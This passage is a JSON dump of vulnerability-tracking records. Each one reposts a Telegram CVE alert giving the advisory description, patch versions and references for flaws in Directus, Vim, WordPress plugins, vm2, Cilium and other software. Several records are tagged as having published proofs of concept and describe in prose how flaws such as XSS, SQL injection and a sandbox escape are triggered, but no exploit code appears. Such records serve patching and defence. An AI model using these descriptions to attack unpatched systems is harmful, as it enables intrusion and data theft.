"https://t.me/DarkWebInformer_CVEAlerts/2779", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24353\n\ud83d\udd39 Description: Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.2.0, when sharing an item, a typical user can specify an arbitrary role. It allows the user to use a higher-privileged role to see fields that otherwise the user should not be able to see. Instances that are impacted are those that use the share feature and have specific roles hierarchy and fields that are not visible for certain roles. Version 11.2.0 contains a patch the issue.\n\ud83d\udccf Published: 2025-01-23T17:45:32.868Z\n\ud83d\udccf Modified: 2025-01-23T17:47:07.136Z\n\ud83d\udd17 References:\n1. https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg\n2. https://github.com/directus/directus/pull/23716\n3. https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804\n4. https://github.com/directus/directus/releases/tag/v11.2.0\n5. https://www.youtube.com/watch?v=DbV4IxbWzN4", "creation_timestamp": "2025-01-23T18:03:11.000000Z"}, {"uuid": "16cf2c7c-0f27-4937-a2a1-b9daaf11cfc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3G9-WG22-V955", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2373", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24014\n\ud83d\udd39 Description: Vim is an open source, command line text editor. A segmentation fault was found in Vim before 9.1.1043. In silent Ex mode (-s -e), Vim typically doesn't show a screen and just operates silently in batch mode. However, it is still possible to trigger the function that handles the scrolling of a gui version of Vim by feeding some binary characters to Vim. The function that handles the scrolling however may be triggering a redraw, which will access the ScreenLines pointer, even so this variable hasn't been allocated (since there is no screen). This vulnerability is fixed in 9.1.1043.\n\ud83d\udccf Published: 2025-01-20T22:53:14.325Z\n\ud83d\udccf Modified: 2025-01-20T22:53:14.325Z\n\ud83d\udd17 References:\n1. https://github.com/vim/vim/security/advisories/GHSA-j3g9-wg22-v955\n2. https://github.com/vim/vim/commit/9d1bed5eccdbb46a26b8a484f5e9163c40e63919", "creation_timestamp": "2025-01-20T23:00:00.000000Z"}, {"uuid": "02e54c3f-d6b4-4f6e-9d5b-d10fffc19b4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WXMH-65F7-JCVW", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2408", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24013\n\ud83d\udd39 Description: CodeIgniter is a PHP full-stack web framework. Prior to 4.5.8, CodeIgniter lacked proper header validation for its name and value. The potential attacker can construct deliberately malformed headers with Header class. This could disrupt application functionality, potentially causing errors or generating invalid HTTP requests. In some cases, these malformed requests might lead to a DoS scenario if a remote service\u2019s web application firewall interprets them as malicious and blocks further communication with the application. This vulnerability is fixed in 4.5.8.\n\ud83d\udccf Published: 2025-01-20T15:57:37.975Z\n\ud83d\udccf Modified: 2025-01-21T14:51:01.754Z\n\ud83d\udd17 References:\n1. https://github.com/codeigniter4/CodeIgniter4/security/advisories/GHSA-x5mq-jjr3-vmx6\n2. https://github.com/codeigniter4/CodeIgniter4/commit/5f8aa24280fb09947897d6b322bf1f0e038b13b6\n3. https://datatracker.ietf.org/doc/html/rfc7230#section-3.2\n4. https://github.com/advisories/GHSA-wxmh-65f7-jcvw", "creation_timestamp": "2025-01-21T15:00:43.000000Z"}, {"uuid": "5e9df994-f85d-435b-acb1-5833d4621c6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3MFW-FHFP-MGRV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2199", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23039\n\ud83d\udd39 Description: Caido is a web security auditing toolkit. A Cross-Site Scripting (XSS) vulnerability was identified in Caido v0.45.0 due to improper sanitization in the URL decoding tooltip of HTTP request and response editors. This issue could allow an attacker to execute arbitrary scripts, potentially leading to the theft of sensitive information. This issue has been addressed in version 0.45.1 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-17T20:13:13.156Z\n\ud83d\udccf Modified: 2025-01-17T20:35:26.480Z\n\ud83d\udd17 References:\n1. https://github.com/caido/caido/security/advisories/GHSA-3mfw-fhfp-mgrv", "creation_timestamp": "2025-01-17T20:57:41.000000Z"}, {"uuid": "00215bd3-61c0-4f78-9a6f-7c9f27dbe926", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43C9-GW4X-PCX6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2439", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24019\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. In versions up to and including 4.4.5, it is possible for any authenticated user, through the use of the filemanager to delete any file owned by the user running the FastCGI Process Manager (FPM) on the host without any limitation on the filesystem's scope. This vulnerability allows any authenticated user to arbitrarily remove content from the Wiki resulting in partial loss of data and defacement/deterioration of the website. In the context of a container installation of YesWiki without any modification, the `yeswiki` files (for example .php) are not owned by the same user (root) as the one running the FPM process (www-data). However in a standard installation, www-data may also be the owner of the PHP files, allowing a malicious user to completely cut the access to the wiki by deleting all important PHP files (like index.php or core files of YesWiki). Version 4.5.0 contains a patch for this issue.\n\ud83d\udccf Published: 2025-01-21T17:36:10.367Z\n\ud83d\udccf Modified: 2025-01-21T17:36:10.367Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-43c9-gw4x-pcx6\n2. https://github.com/YesWiki/yeswiki/commit/3ddd833d22703caf9025659eb174f7765df7147c", "creation_timestamp": "2025-01-21T18:00:53.000000Z"}, {"uuid": "ac4afa5a-67f7-4c4f-b655-eef267712b87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FCR8-4R9F-R66M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2209", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23205\n\ud83d\udd39 Description: nbgrader is a system for assigning and grading notebooks. Enabling frame-ancestors: 'self' grants any JupyterHub user the ability to extract formgrader content by sending malicious links to users with access to formgrader, at least when using the default JupyterHub configuration of `enable_subdomains = False`. #1915 disables a protection which would allow user Alice to craft a page embedding formgrader in an IFrame. If Bob visits that page, his credentials will be sent and the formgrader page loaded. Because Alice's page is on the same Origin as the formgrader iframe, Javasript on Alice's page has _full access_ to the contents of the page served by formgrader using Bob's credentials. This issue has been addressed in release 0.9.5 and all users are advised to upgrade. Users unable to upgrade may disable `frame-ancestors: self`, or enable per-user and per-service subdomains with `JupyterHub.enable_subdomains = True` (then even if embedding in an IFrame is allowed, the host page does not have access to the contents of the frame).\n\ud83d\udccf Published: 2025-01-17T20:23:21.818Z\n\ud83d\udccf Modified: 2025-01-17T20:23:21.818Z\n\ud83d\udd17 References:\n1. https://github.com/jupyter/nbgrader/security/advisories/GHSA-fcr8-4r9f-r66m\n2. https://github.com/jupyter/nbgrader/pull/1915\n3. https://github.com/jupyter/nbgrader/commit/73e137511ac1dc02e95790d4fd6d4d88dab42325\n4. https://jupyterhub.readthedocs.io/en/stable/explanation/websecurity.html#:~:text=frame-ancestors", "creation_timestamp": "2025-01-17T20:57:55.000000Z"}, {"uuid": "8688862e-2b7d-45f6-821d-f5bde953d4cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F537-2529-5PF3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3128", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-f537-2529-5pf3\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The Membership Plugin \u2013 Restrict Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.2.13 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.\n\ud83d\udccf Published: 2025-01-26T09:30:31Z\n\ud83d\udccf Modified: 2025-01-26T09:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-11090\n2. https://plugins.trac.wordpress.org/changeset/3227065/restrict-content\n3. https://www.wordfence.com/threat-intel/vulnerabilities/id/7615c391-ccb1-4990-bbfd-949782cc609a?source=cve", "creation_timestamp": "2025-01-26T10:06:16.000000Z"}, {"uuid": "42dab2ae-f9fc-4066-9999-58d211d5de7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44W3-4X9P-XMFF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3132", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-44w3-4x9p-xmff\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The Zox News theme for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'backup_options' and 'restore_options' function in all versions up to, and including, 3.16.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.\n\ud83d\udccf Published: 2025-01-26T12:30:31Z\n\ud83d\udccf Modified: 2025-01-26T12:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-11936\n2. https://themeforest.net/item/zox-news-professional-wordpress-news-magazine-theme/20381541\n3. https://www.wordfence.com/threat-intel/vulnerabilities/id/3f061e7f-6a87-4d4a-9b4e-8234883f2ebc?source=cve", "creation_timestamp": "2025-01-26T13:06:17.000000Z"}, {"uuid": "020e62ef-d0a2-4d55-b343-3fc1d17ed75c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X7QC-WX3V-P86V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3131", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x7qc-wx3v-p86v\n\ud83d\udd25 CVSS Score: N/A (CVSS_V3)\n\ud83d\udd39 Description: The WC Affiliate \u2013 A Complete WooCommerce Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via any parameter in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n\ud83d\udccf Published: 2025-01-26T12:30:31Z\n\ud83d\udccf Modified: 2025-01-26T12:30:31Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12334\n2. https://plugins.trac.wordpress.org/changeset/3224312/wc-affiliate\n3. https://www.wordfence.com/threat-intel/vulnerabilities/id/efca1ee2-2038-440e-941c-22533b4d833b?source=cve", "creation_timestamp": "2025-01-26T13:06:16.000000Z"}, {"uuid": "9ce8788c-cbab-43ca-8d06-02bcbd8432b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6Q32-HQ47-5QQ3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2571", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-42471\n\ud83d\udd39 Description: actions/artifact is the GitHub ToolKit for developing GitHub Actions.  Versions of `actions/artifact` on the 2.x branch before 2.1.7 are vulnerable to arbitrary file write when using `downloadArtifactInternal`, `downloadArtifactPublic`, or `streamExtractExternal` for extracting a specifically crafted artifact that contains path traversal filenames. Users are advised to upgrade to version 2.1.7 or higher. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2024-09-02T16:13:50.712Z\n\ud83d\udccf Modified: 2025-01-22T15:12:27.332Z\n\ud83d\udd17 References:\n1. https://github.com/actions/toolkit/security/advisories/GHSA-6q32-hq47-5qq3\n2. https://github.com/actions/toolkit/pull/1724\n3. https://snyk.io/research/zip-slip-vulnerability", "creation_timestamp": "2025-01-22T16:02:00.000000Z"}, {"uuid": "80120144-4a41-4cc9-b98c-1bdbf3bb6e48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69CG-W8VM-H229", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2522", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-10761\n\ud83d\udd39 Description: A vulnerability was found in Umbraco CMS up to 10.7.7/12.3.6/13.5.2/14.3.1/15.1.1. It has been classified as problematic. Affected is an unknown function of the file /Umbraco/preview/frame?id{} of the component Dashboard. The manipulation of the argument culture leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.8.8, 13.5.3, 14.3.2 and 15.1.2 is able to address this issue. It is recommended to upgrade the affected component.\n\ud83d\udccf Published: 2024-11-04T05:00:06.691Z\n\ud83d\udccf Modified: 2025-01-22T07:47:21.294Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.282930\n2. https://vuldb.com/?ctiid.282930\n3. https://vuldb.com/?submit.427091\n4. https://drive.google.com/file/d/1YoZgdlS3QT7Xu005j9RO-FFUT8RbB0Da/view?usp=sharing\n5. https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-69cg-w8vm-h229", "creation_timestamp": "2025-01-22T08:01:58.000000Z"}, {"uuid": "c183e116-3ad1-4186-a27e-3dbfa0182d0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QRM9-F75W-HG4C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3934", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25202\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Impact\n\nApplications which have been bootstrapped by the new igniter installer (since AshAuthentication v4.1.0) and who have used the magic link strategy, password resets, confirmation, or are manually revoking tokens are affected by revoked tokens being allowed to verify as valid. If you did not use the new installer, then you are absolutely not affected.\n\nAdditionally, unless you have implemented any kind of custom token revocation feature in your application (in which case even cursory testing would have uncovered this issue), then you will not be significantly affected. \n\nThe impact here for users is as follows:\n\n  - For users using the magic link strategy, magic link tokens are reusable until they expire instead of being immediately revoked. By default magic link tokens are valid for 10 minutes.\n  - For users of password resets in the password strategy, password reset tokens are reusable until they expire instead of being immediately revoked. By default password reset tokens are valid for 3 days.\n  - For users of the confirmation add-on, confirmation tokens are reusable until they expire instead of being immediately revoked. By default password reset tokens are valid for 3 days.\n\n### Patches\n\nThe flaw is patched in version 4.4.9. Additionally a compile time warning is shown to users with remediation instructions if they upgrade. 4.4.9 ships with an upgrader, so if you use `mix igniter.upgrade ash_authentication` the necessary patch will be applied for you. Otherwise you can run the upgrader manually as described in the error message\n\n#### Example\n```elixir\n[warning] Warning while compiling Tunez.Accounts.Token:\n\nThe `:jti` and `:token` options to the `:revoked?` action must allow nil values and it must return a `:boolean`.\n\nThis was an error in our igniter installer previous to version 4.4.9, which allowed revoked tokens to be reused.\n\nTo fix this, run the following command in your shell:\n\n    mix ash_authentication.upgrade 4.4.8 4.4.9\n\nOr:\n\n  - remove `allow_nil?: false` from these action arguments, and\n  - ensure that the action returns `:boolean`.\n\n  like so:\n\n    action :revoked?, :boolean do\n      description \"Returns true if a revocation token is found for the provided token\"\n      argument :token, :string, sensitive?: true\n      argument :jti, :string, sensitive?: true\n\n      run AshAuthentication.TokenResource.IsRevoked\n    end\n```\n\n### Workarounds\n\nDelete the generated `:revoked?` generic action in your token resource This will cause it to use the one internal to AshAuthentication which has always been correct. Alternatively,  manually make the changes described above.\n\n### References\n\nSee the `#ash_authentication` channel on the Ash Discord.\n\ud83d\udccf Published: 2025-02-11T18:12:33Z\n\ud83d\udccf Modified: 2025-02-11T21:40:09Z\n\ud83d\udd17 References:\n1. https://github.com/team-alembic/ash_authentication/security/advisories/GHSA-qrm9-f75w-hg4c\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-25202\n3. https://github.com/team-alembic/ash_authentication/commit/2dee55252df26fe3d990ff1199397cdcf1bfea8a\n4. https://github.com/team-alembic/ash_authentication", "creation_timestamp": "2025-02-11T22:07:59.000000Z"}, {"uuid": "b93b8289-514c-4bb7-8195-3b4b13fd8e61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQJ2-2C2X-GJMM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2672", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-31145\n\ud83d\udd39 Description: Collabora Online is a collaborative online office suite based on LibreOffice technology. This vulnerability report describes a reflected XSS vulnerability with full CSP bypass in Nextcloud installations using the recommended bundle. The vulnerability can be exploited to perform a trivial account takeover attack. The vulnerability allows attackers to inject malicious code into web pages, which can be executed in the context of the victim's browser session. This means that an attacker can steal sensitive data, such as login credentials or personal information, or perform unauthorized actions on behalf of the victim, such as modifying or deleting data. In this specific case, the vulnerability allows for a trivial account takeover attack. An attacker can exploit the vulnerability to inject code into the victim's browser session, allowing the attacker to take over the victim's account without their knowledge or consent. This can lead to unauthorized access to sensitive information and data, as well as the ability to perform actions on behalf of the victim. Furthermore, the fact that the vulnerability bypasses the Content Security Policy (CSP) makes it more dangerous, as CSP is an important security mechanism used to prevent cross-site scripting attacks. By bypassing CSP, attackers can circumvent the security measures put in place by the web application and execute their malicious code. This issue has been patched in versions 22.05.13, 21.11.9, and 6.4.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2023-05-15T20:58:32.479Z\n\ud83d\udccf Modified: 2025-01-22T21:18:48.370Z\n\ud83d\udd17 References:\n1. https://github.com/CollaboraOnline/online/security/advisories/GHSA-rqj2-2c2x-gjmm", "creation_timestamp": "2025-01-22T22:02:40.000000Z"}, {"uuid": "3980c3e0-10e0-4bd8-b57b-a01991344d86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HGM9-2Q42-C7F3", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2673", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-31131\n\ud83d\udd39 Description: Greenplum Database (GPDB) is an open source data warehouse based on PostgreSQL. In versions prior to 6.22.3 Greenplum Database used an unsafe methods to extract tar files within GPPKGs. greenplum-db is vulnerable to path traversal leading to arbitrary file writes. An attacker can use this vulnerability to overwrite data or system files potentially leading to crash or malfunction of the system. Any files which are accessible to the running process are at risk. All users are requested to upgrade to Greenplum Database version 6.23.2 or higher. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2023-05-15T21:05:49.873Z\n\ud83d\udccf Modified: 2025-01-22T21:18:25.525Z\n\ud83d\udd17 References:\n1. https://github.com/greenplum-db/gpdb/security/advisories/GHSA-hgm9-2q42-c7f3\n2. https://github.com/greenplum-db/gpdb/commit/1ec4affbba7c9745f64edbd80a6680ad29b09471", "creation_timestamp": "2025-01-22T22:02:40.000000Z"}, {"uuid": "34a4585c-d95a-425a-876b-3ec66c6323b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9M5P-C77C-F9J7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2579", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23028\n\ud83d\udd39 Description: Cilium is a networking, observability, and security solution with an eBPF-based dataplane. A denial of service vulnerability affects versions 1.14.0 through 1.14.7, 1.15.0 through 1.15.11, and 1.16.0 through 1.16.4. In a Kubernetes cluster where Cilium is configured to proxy DNS traffic, an attacker can crash Cilium agents by sending a crafted DNS response to workloads from outside the cluster. For traffic that is allowed but without using DNS-based policy, the dataplane will continue to pass traffic as configured at the time of the DoS. For workloads that have DNS-based policy configured, existing connections may continue to operate, and new connections made without relying on DNS resolution may continue to be established, but new connections which rely on DNS resolution may be disrupted. Any configuration changes that affect the impacted agent may not be applied until the agent is able to restart. This issue is fixed in Cilium v1.14.18, v1.15.12, and v1.16.5. No known workarounds are available.\n\ud83d\udccf Published: 2025-01-22T16:48:19.722Z\n\ud83d\udccf Modified: 2025-01-22T16:48:19.722Z\n\ud83d\udd17 References:\n1. https://github.com/cilium/cilium/security/advisories/GHSA-9m5p-c77c-f9j7\n2. https://github.com/cilium/cilium/pull/36252", "creation_timestamp": "2025-01-22T17:01:50.000000Z"}, {"uuid": "73e7e3ef-9d56-4d14-b873-9a18b2ddfa4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9G2C-7C7G-P58R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2668", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32308\n\ud83d\udd39 Description: anuko timetracker is an open source time tracking system. Boolean-based blind SQL injection vulnerability existed in Time Tracker invoices.php in versions prior to 1.22.11.5781. This was happening because of a coding error after validating parameters in POST requests. There was no check for errors before adjusting invoice sorting order. Because of this, it was possible to craft a POST request with malicious SQL for Time Tracker database. This issue has been fixed in version 1.22.11.5781. Users are advised to upgrade. Users unable to upgrade may insert an additional check for errors in a condition before calling `ttGroupHelper::getActiveInvoices()` in invoices.php.\n\ud83d\udccf Published: 2023-05-15T20:47:06.537Z\n\ud83d\udccf Modified: 2025-01-22T21:40:50.490Z\n\ud83d\udd17 References:\n1. https://github.com/anuko/timetracker/security/advisories/GHSA-9g2c-7c7g-p58r\n2. https://github.com/anuko/timetracker/commit/8a7367d7f77ea697c090f5ca4e19669181cc7bcf", "creation_timestamp": "2025-01-22T22:02:33.000000Z"}, {"uuid": "ae23b76a-fd65-4a46-a211-66062f197b34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WHPJ-8F3W-67P5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2667", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32314\n\ud83d\udd39 Description: vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2023-05-15T19:46:32.834Z\n\ud83d\udccf Modified: 2025-01-22T21:42:31.793Z\n\ud83d\udd17 References:\n1. https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5\n2. https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf\n3. https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac\n4. https://github.com/patriksimek/vm2/releases/tag/3.9.18", "creation_timestamp": "2025-01-22T22:02:32.000000Z"}, {"uuid": "c1992c45-6957-490b-86f5-fa20902d9fe0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WV8V-RMW2-25WC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2418", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24012\n\ud83d\udd39 Description: Umbraco is a free and open source .NET content management system. Starting in version 14.0.0 and prior to versions 14.3.2 and 15.1.2, authenticated users are able to exploit a cross-site scripting vulnerability when viewing certain localized backoffice components. Versions 14.3.2 and 15.1.2 contain a patch.\n\ud83d\udccf Published: 2025-01-21T15:32:43.910Z\n\ud83d\udccf Modified: 2025-01-21T15:32:43.910Z\n\ud83d\udd17 References:\n1. https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-wv8v-rmw2-25wc\n2. https://github.com/umbraco/Umbraco-CMS/commit/d4f8754f933895b3a329296e25ddea6f84a0aea2", "creation_timestamp": "2025-01-21T16:00:42.000000Z"}, {"uuid": "1e0162d0-e1e7-4cb5-a160-8691de7886fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPHC-5F2J-JHVG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2417", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24017\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. Versions up to and including 4.4.5 are vulnerable to any end-user crafting a DOM based XSS on all of YesWiki's pages which is triggered when a user clicks on a malicious link. The vulnerability makes use of the search by tag feature. When a tag doesn't exist, the tag is reflected on the page and isn't properly sanitized on the server side which allows a malicious user to generate a link that will trigger an XSS on the client's side when clicked. This vulnerability allows any user to generate a malicious link that will trigger an account takeover when clicked, therefore allowing a user to steal other accounts, modify pages, comments, permissions, extract user data (emails), thus impacting the integrity, availability and confidentiality of a YesWiki instance. Version 4.5.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-01-21T15:37:58.654Z\n\ud83d\udccf Modified: 2025-01-21T15:37:58.654Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-wphc-5f2j-jhvg\n2. https://github.com/YesWiki/yeswiki/commit/c1e28b59394957902c31c850219e4504a20db98b\n3. https://github.com/YesWiki/yeswiki/blob/doryphore-dev/tools/tags/handlers/page/listpages.php#L84", "creation_timestamp": "2025-01-21T16:00:41.000000Z"}, {"uuid": "1403351d-a359-4525-b34f-eeecc65bd136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27G8-5Q48-XMW6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2430", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24020\n\ud83d\udd39 Description: WeGIA is a Web manager for charitable institutions. An Open Redirect vulnerability was identified in the `control.php` endpoint of versions up to and including 3.2.10 of the WeGIA application. The vulnerability allows the `nextPage` parameter to be manipulated, redirecting authenticated users to arbitrary external URLs without validation. The issue stems from the lack of validation for the `nextPage` parameter, which accepts external URLs as redirection destinations. This vulnerability can be exploited to perform phishing attacks or redirect users to malicious websites. Version 3.2.11 contains a fix for the issue.\n\ud83d\udccf Published: 2025-01-21T17:51:16.698Z\n\ud83d\udccf Modified: 2025-01-21T17:51:16.698Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-27g8-5q48-xmw6\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/89d98bf074cebf6c4ed95fca6f64e325c0b1d2f0\n3. https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/v3.2.11", "creation_timestamp": "2025-01-21T18:00:40.000000Z"}, {"uuid": "1837665e-10c5-43bc-a3b3-36376ffde806", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9W72-9QWW-QJ6G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2949", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22611\n\ud83d\udd39 Description: Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 